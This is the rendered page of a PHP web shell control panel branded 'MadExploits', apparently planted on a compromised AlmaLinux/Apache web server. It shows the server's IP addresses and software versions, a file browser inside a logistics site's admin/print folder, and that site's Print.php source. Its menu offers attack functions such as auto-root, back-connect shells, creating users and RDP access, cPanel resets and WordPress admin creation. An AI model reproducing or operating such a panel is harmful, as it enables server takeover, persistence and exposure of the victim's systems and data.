Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.147.75.9
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
3xlogistics.com /
admin /
print /
[ HOME SHELL ]
Name
Size
Permission
Action
fonts
[ DIR ]
drwxr-xr-x
1Head_Print.php
3.83
KB
-rw-r--r--
3End_Print.php
0
B
-rw-r--r--
Print.php
797
B
-rw-r--r--
Print_member_agent.php
48.85
KB
-rw-r--r--
Print_member_agent_all.php
7.48
KB
-rw-r--r--
Print_member_agent_front_end.p...
49.81
KB
-rw-r--r--
Print_member_agent_front_end_P...
51.08
KB
-rw-r--r--
fonts.css
357
B
-rw-r--r--
index.php
213
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Print.php
<?PHP include '1Head_Print.php'; // if ($sesUsernameChk == "0" or $sesPasswordChk == "0" or $sesMemberID == "0" or $sesMemberSubName == "0" or $sesMemberEmail == "0") { // include 'index.html'; // } else { if (empty($_GET['page'])) { $CHK_Print = 0; } else { $CHK_Print = trim($_GET['page']); } if ($CHK_Print == '') { include 'index.html'; } else if ($CHK_Print == "member_agent") { include 'Print_member_agent.php'; } else if ($CHK_Print == "Print_member_agent_front_end") { include 'Print_member_agent_front_end.php'; } else if ($CHK_Print == "Print_member_agent_front_end_Print") { include 'Print_member_agent_front_end_Print.php'; } else if ($CHK_Print == "member_agent_all") { include 'Print_member_agent_all.php'; }else{ include 'index.html'; } //} ?>
Close